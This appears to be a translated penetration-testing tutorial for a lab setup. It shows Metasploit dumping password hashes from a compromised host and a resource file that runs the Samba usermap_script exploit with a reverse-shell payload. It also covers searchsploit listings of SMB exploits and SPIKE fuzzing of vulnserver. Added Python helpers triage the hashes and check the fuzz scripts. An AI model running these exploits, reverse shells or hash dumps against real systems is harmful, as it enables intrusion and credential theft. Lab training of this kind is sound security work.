msf6 exploit(multi/samba/usermap_script) > use post/linux/gather/hashdump 
msf6 post(linux/gather/hashdump) > set session 1
session => 1
msf6 post(linux/gather/hashdump) > exploit

[!] SESSION may not be compatible with this module.
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20210317221902_default_192.168.10.183_linux.hashes_021240.txt
[*] Post module execution completed
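The hashdump post module writes the unshadowed file in user:hash:uid:gid:gecos:home:shell form. What a defender does with such a finding is triage which accounts are actually exposed: which hash scheme each entry uses (the $1$ prefix above is md5crypt), whether the account is locked, and whether it has an interactive shell or uid 0. The following added example, not Metasploit code, classifies entries in that format and turns them into remediation items; its sample lines are constructed with placeholder hashes and are not the loot file from this page.

```python
"""Triage of the unshadowed password file that post/linux/gather/hashdump
saves to loot (user:hash:uid:gid:gecos:home:shell).  Added example, not
Metasploit code; SAMPLE_UNSHADOWED is constructed with placeholder hashes
and is not this page's loot file."""

# Constructed sample: the hash fields only have the right shape.
SAMPLE_UNSHADOWED = """root:$1$ab12cd34$FAKEmd5cryptHASHxxxxxxxxxxx:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
sshd:!:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:$6$saltsalt$FAKEsha512cryptHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
service:$1$zz99yy88$FAKEmd5cryptHASHyyyyyyyyyyy:1002:1002:,,,:/home/service:/bin/bash
guest::1003:1003:guest:/home/guest:/bin/bash
"""

# crypt(3) scheme identifiers -> algorithm name
HASH_PREFIXES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}
WEAK = {"md5crypt", "descrypt"}          # fast legacy schemes, cheap to brute-force
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}


def hash_kind(field):
    """Name the scheme of one password field, or 'locked' / 'empty'."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"               # traditional DES crypt: 2-char salt + 11
    return "unknown"


def parse_unshadowed(text):
    entries = []
    for raw in text.splitlines():
        fields = raw.split(":")
        if len(fields) != 7:
            continue                    # blank or malformed line
        user, pw, uid, _gid, _gecos, _home, shell = fields
        entries.append({"user": user, "kind": hash_kind(pw), "uid": int(uid),
                        "shell": shell, "interactive": shell not in NOLOGIN_SHELLS})
    return entries


def summarize(text):
    """Count entries per scheme, e.g. to report how much of the host is still on md5crypt."""
    counts = {}
    for entry in parse_unshadowed(text):
        counts[entry["kind"]] = counts.get(entry["kind"], 0) + 1
    return counts


def audit_unshadowed(text):
    """(user, remediation) pairs for the accounts that are actually exposed."""
    findings = []
    for e in parse_unshadowed(text):
        if e["kind"] == "locked":
            continue
        if e["kind"] == "empty":
            findings.append((e["user"], "empty password field: lock the account or set a password"))
        elif e["kind"] in WEAK:
            who = ("uid 0 account" if e["uid"] == 0
                   else "interactive account" if e["interactive"] else "service account")
            findings.append((e["user"], f"{e['kind']} hash on {who}: set ENCRYPT_METHOD SHA512 "
                                        "(or YESCRYPT where supported) in /etc/login.defs and force a password change"))
    return findings


if __name__ == "__main__":
    print(summarize(SAMPLE_UNSHADOWED))
    for user, why in audit_unshadowed(SAMPLE_UNSHADOWED):
        print(f"{user}: {why}")
```

Locked entries are skipped because a `!` or `*` field cannot be used to log in regardless of what follows it; an empty field is reported first because it needs no cracking at all.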

Multi-target Security Testing with Metasploit Resource Files

Shortcomings of the Metasploit Command Console

  • It cannot test several targets at once, and relying solely on typed commands is tedious. To make up for this, the Metasploit Framework provides a resource file interface: the console commands are written into a resource file, msfconsole reads the file and executes the commands in it, which avoids typing the same commands repeatedly. Multiple targets can of course also be entered directly for testing.

Metasploit Resource File Setup

  • A resource file is essentially a line-delimited text file containing a series of commands for msfconsole to execute. Resource files are text files ending in .rc.
┌──(root💀kali)-[~/桌面]
└─# vim test.rc     

use exploit/multi/samba/usermap_script
set pyload cmd/unix/reverse
set rhost 192.168.10.183
set lhost 192.168.10.184
exploit -j
use exploit/unix/ftp/vsftpd_234_backdor
set pyload cmd/unix/interact
set rhost 193.168.10.183
exploit -j
  • Here exploit -j puts the established session in the background. Other test commands can be added as well. Run the resource file from a terminal with msfconsole -r test.rc.
┌──(root💀kali)-[~/桌面]
└─# msfconsole -r test.rc  
...

Metasploit tip: You can use help to view all 
available commands

[*] Processing test.rc for ERB directives.
resource (test.rc)> use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (test.rc)> set pyload cmd/unix/reverse
pyload => cmd/unix/reverse
resource (test.rc)> set rhost 192.168.10.183
rhost => 192.168.10.183
resource (test.rc)> set lhost 192.168.10.184
lhost => 192.168.10.184
resource (test.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (test.rc)> use exploit/unix/ftp/vsftpd_234_backdor
[*] Started reverse TCP handler on 192.168.10.184:4444 
[-] No results from search
[-] Failed to load module: exploit/unix/ftp/vsftpd_234_backdor
resource (test.rc)> set pyload cmd/unix/interact
pyload => cmd/unix/interact
resource (test.rc)> set rhost 193.168.10.183
rhost => 193.168.10.183
resource (test.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[-] Handler failed to bind to 192.168.10.184:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 193.168.10.183:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
msf6 exploit(multi/samba/usermap_script) > [*] Command shell session 1 opened (192.168.10.184:4444 -> 192.168.10.183:45742) at 2021-03-17 22:40:18 -0400
msf6 exploit(multi/samba/usermap_script) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.184:4444 -> 192.168.10.183:45742 (192.168.10.183)

Finding and using exploit code (EXPs)

Shortcuts for obtaining EXPs

  • Search for vulnerabilities on Exploit-DB: https://www.exploit-db.com/
  • SecurityFocus: https://www.securityfocus.com/

The searchsploit tool

  • Run searchsploit -h in the terminal to view the usage help.
┌──(root💀kali)-[~/桌面]
└─# searchsploit -h
  Usage: searchsploit [options] term1 [term2] ... [termN]

==========
 Examples 
==========
  searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit -p 39446
  searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
  searchsploit -s Apache Struts 2.0.0
  searchsploit linux reverse password
  searchsploit -j 55555 | json_pp

  For more examples, see the manual: https://www.exploit-db.com/searchsploit

=========
 Options 
=========
## Search Terms
   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe)
   -e, --exact    [Term]      Perform an EXACT & order match on exploit title (Default is an AND match on each term) [Implies "-t"]
                                e.g. "WordPress 4.1" would not be detect "WordPress Core 4.1")
   -s, --strict               Perform a strict search, so input values must exist, disabling fuzzy search for version range
                                e.g. "1.1" would not be detected in "1.0 < 1.3")
   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path)
       --exclude="term"       Remove values from results. By using "|" to separate, you can chain multiple values
                                e.g. --exclude="term1|term2|term3"
...
  • Search for Windows vulnerabilities (here, SMB-related ones).
┌──(root💀kali)-[~/桌面]
└─# searchsploit windows smb                                                                                                     
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC)                                                                                                                                                     | windows/dos/39452.txt
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                                                                                                                                             | windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)                                                                                                           | windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service                                                                                                                                                            | windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                                                                                 | windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)                                                                                                                                        | windows/dos/1065.c
Microsoft Windows - 'SMBGhost' Remote Code Execution                                                                                                                                                      | windows/remote/48537.py
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)                                                                                                                                     | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)                                                                                                              | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)                                                                                                 | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)                                                                                                               | windows/dos/6463.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)                                                                                                                           | windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)                                                                                                                                                  | windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)                                                                                                                                      | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                                                                             | windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service                                                                                                                             | windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)                                                                                                                                                      | windows/remote/7125.txt
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)                                                                                              | windows/dos/48216.md
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation                                                                                         | windows/local/48267.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC)                                                                                                                                                           | windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation                                                                                                               | windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow                                                                                                                                            | windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution                                                                                                                                    | windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution                                                                                                                                             | windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                                          | windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)                                                                                                                           | windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                      | windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service                                                                                                                          | windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                                | windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal                                                                                                                             | windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client                                                                                                             | windows/remote/19197.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                                                                             | windows_x86-64/remote/41987.py
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation                                                                                                             | windows/dos/43517.txt
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)                                                                                                      | windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)                                                                                                                            | windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)                                                                                                                 | windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)                                                                                                                 | windows/dos/21747.txt
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)                                                                                                                             | windows_x86/local/16678.rb
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow                                                                                                                           | windows/remote/9303.c
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow                                                                                                                 | windows/remote/9318.py
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)                                                                                                                                | windows/dos/9029.rb
VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)                                                                                                                       | windows/dos/9427.py
VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow                                                                                                                                             | windows/remote/9816.py
VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC)                                                                                                                       | windows/dos/10333.py
VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)                                                                                                               | windows/dos/14892.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Compiling and using an EXP yourself

  • C-language EXP: compile and use with gcc <file> -o <output>.
  • Python EXP: run with python <file>.

Windows buffer overflow 0-day discovery and exploitation

Windows registers

  • A register is high-speed storage inside the CPU; every executing process needs registers to hold its data. The x86/x64 distinction is between Intel 32-bit and 64-bit architectures.
  • Assembly language is a direct, human-readable substitute for machine code, e.g. JMP -> 01010101.
  • General-purpose registers:
    • Accumulator (EAX)
    • Base register (EBX)
    • Counter (ECX)
    • Data register (EDX)
    • Extended base pointer (EBP)
    • Source index (ESI)
    • Destination index (EDI)
    • Stack pointer (ESP)
  • The first four (EAX, EBX, ECX, EDX) are mainly used for arithmetic; the last four (EBP, ESI, EDI, ESP) mainly hold pointers to memory addresses.
  • Instruction pointer (EIP): while a program runs, EIP holds the address of the next instruction to execute, telling the CPU what to do next.
  • Segment registers: segmentation is a memory-protection technique that divides memory into segments and gives each a start address, a size and access permissions. The segment registers are CS (code segment), SS (stack segment), DS (data segment), ES (extra data segment), FS and GS (additional data segments).
  • Status and control register: EFLAGS is 32 bits wide, each bit being 0 or 1 (off or on). For now only ZF (zero flag), OF (overflow flag) and CF (carry flag) matter.

Lab setup

  • The lab uses an exe with a known buffer-overflow vulnerability as the target.
  • Download: https://github.com/stephenbradshaw/vulnserver
  • The download is a zip archive; extract it to obtain the executable.
  • Run the exe from a command prompt as vulnserver.exe <port>; the default port is 9999.

  • Use netstat -an | find "<port>" to check whether the port is in use.

  • From Kali Linux, connect to the running vulnserver.exe with netcat to test the connection, then send HELP to get the help text.
┌──(root💀kali)-[~/桌面]
└─# nc 192.168.1.102 9999                                                                                                      
Welcome to Vulnerable Server! Enter HELP for help.
UNKNOWN COMMAND
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

Fuzzing in practice

  • Kali Linux ships the SPIKE fuzzing toolkit by default; type generic_ and press TAB twice to list the toolkit's tools.
┌──(root💀kali)-[~]
└─# generic_
generic_chunked           generic_listen_tcp        generic_send_tcp          generic_send_udp          generic_web_server_fuzz   generic_web_server_fuzz2
  • Because the server speaks TCP, the TCP fuzzer generic_send_tcp is the tool to use; running it without arguments prints its usage.
┌──(root💀kali)-[~/桌面]
└─# generic_send_tcp                                                                                                                                                                                                                   
argc=1
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0
  • Write a SPIKE script; the default script location is /usr/share/spike/.
┌──(root💀kali)-[~/桌面]
└─# ls /usr/share/spike/                                                                                                                                                                                                        
audits  backups  data  dcedump  include  testscripts
  • SPIKE scripts end in .spk and are written with a small set of primitives:
  • s_readline(); // read one line from the server (the banner).
  • s_string("string"); // add the literal string "string" to the request.
  • s_string_repeat("string", 200); // add "string" repeated 200 times.
  • s_string_variable("string"); // mark a fuzz point: SPIKE substitutes its fuzz strings here, with "string" as the value being iterated over.
┌──(root💀kali)-[~]
└─# cat fuzz.spk
s_readline();
s_string("SRUN |");
s_string_variable("VALUE");
  • Test with generic_send_tcp.
┌──(root💀kali)-[~/桌面]
└─# generic_send_tcp 192.168.1.102 9999 fuuz.spk 0 0 
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
generic_send_tcp: undefined symbol: s_randline
  • The server did not crash. Note, however, the last line of the output: generic_send_tcp aborted with undefined symbol: s_randline, meaning the script actually run (fuuz.spk) still misspelled s_readline, so no fuzz strings were sent at all. Fix the name and rerun before drawing conclusions about SRUN.
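A typo like s_randline is cheap to catch before a fuzzer ever touches the target. The following checker is added here and is not part of SPIKE or of the original page: it parses a .spk script such as the SRUN and TRUN scripts on this page, reports unknown primitives and wrong argument counts, and renders the request one fuzz iteration would send. The primitive table, its argument counts and the treatment of // as a comment are assumptions of this example.

```python
import re

# Primitives from this page's scripts plus s_string_repeat, with their argument counts.
# This table is an assumption for the checker; SPIKE's real API has many more primitives.
KNOWN_PRIMITIVES = {
    "s_readline": 0,         # receive one line from the server (the banner)
    "s_string": 1,           # add a literal to the outgoing request
    "s_string_repeat": 2,    # add a literal repeated n times
    "s_string_variable": 1,  # fuzz point: SPIKE substitutes its fuzz strings here
}
CALL_RE = re.compile(r'^\s*(\w+)\s*\((.*)\)\s*;\s*$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|(\d+)')


def parse_spk(text):
    """Turn a .spk script into [(primitive, args, line_no), ...]. Text after // is
    treated as a comment (assumed). Raises ValueError on a line that is not name(args);"""
    calls = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("//", 1)[0].strip()
        if not line:
            continue
        m = CALL_RE.match(line)
        if not m:
            raise ValueError(f"line {no}: not a SPIKE call: {raw.strip()}")
        args = [int(n) if n != "" else s for s, n in ARG_RE.findall(m.group(2))]
        calls.append((m.group(1), args, no))
    return calls


def check_spk(text):
    """Problems a run would hit: unknown primitives (like the s_randline typo that
    aborted the run above) and calls with the wrong number of arguments."""
    problems = []
    for name, args, no in parse_spk(text):
        want = KNOWN_PRIMITIVES.get(name)
        if want is None:
            problems.append(f"line {no}: undefined symbol: {name}")
        elif len(args) != want:
            problems.append(f"line {no}: {name} expects {want} argument(s), got {len(args)}")
    return problems


def render(text, fuzz_value):
    """The request generic_send_tcp would send for one fuzz value (e.g. 'TRUN |' + value),
    so the command's shape can be reviewed before a run. s_readline is a receive step."""
    pieces = []
    for name, args, _ in parse_spk(text):
        if name == "s_string":
            pieces.append(args[0])
        elif name == "s_string_repeat":
            pieces.append(args[0] * args[1])
        elif name == "s_string_variable":
            pieces.append(fuzz_value)
    return "".join(pieces)
```

Running check_spk over a script before handing it to generic_send_tcp turns the runtime "undefined symbol" abort into a line-numbered report.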

  • Next, test the TRUN parameter.
┌──(root💀kali)-[~]
└─# cat fuzz.spk
s_readline();
s_string("TRUN |");
s_string_variable("VALUE");
  • The server crashed and exited, which indicates that the TRUN command is vulnerable.